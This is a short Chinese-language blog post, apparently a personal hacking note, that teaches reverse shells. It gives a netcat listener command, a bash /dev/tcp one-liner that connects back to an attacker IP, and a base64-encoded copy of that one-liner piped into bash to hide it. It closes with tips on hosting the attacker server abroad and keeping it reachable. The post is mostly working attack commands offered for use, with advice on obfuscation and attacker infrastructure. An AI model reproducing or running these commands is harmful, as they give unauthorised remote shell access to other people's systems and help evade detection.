Home Hacker 反弹shellreverseshell以及base64转换
Post
Cancel

Hacker 反弹shellreverseshell以及base64转换

反弹shell , 超级强大, 英文 reverse shell (反向shell ) 

参考

在线生成器:https://shellgenerator.github.io

这个简直太强大了!

1. 在本地搭建好一个 reverse shell server:   nc -nvlp 5000

这就表示,你的本地已经有5000端口在监听从外面发过来的 请求了。 

此时屏幕是冻结的(等待中)

2. 在远程,可以运行任意命令(见上面的在线生成器).  例如;

bash -i >& /dev/tcp/172.17.211.247/5000 0>&1

3. 在本地,就会发现,已经登录了远程服务器了。 操作跟本地shell是一样一样的!  太牛了!

几个例子

1. 转换

$ echo "/bin/bash -i >& /dev/tcp/172.17.211.247/5000 0>&1" | base64

L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNy4yMTEuMjQ3LzUwMDAgMD4mMQo=

$ echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNy4yMTEuMjQ3LzUwMDAgMD4mMQo= | base64 -d | bash

就可以运行了。

心得

1. attacker server 端口要全部开启,或者使用80端口

2. 找个境外的服务器

3. 先测试一下该server ip在国内是否可以访问的通

This post is licensed under CC BY 4.0 by the author.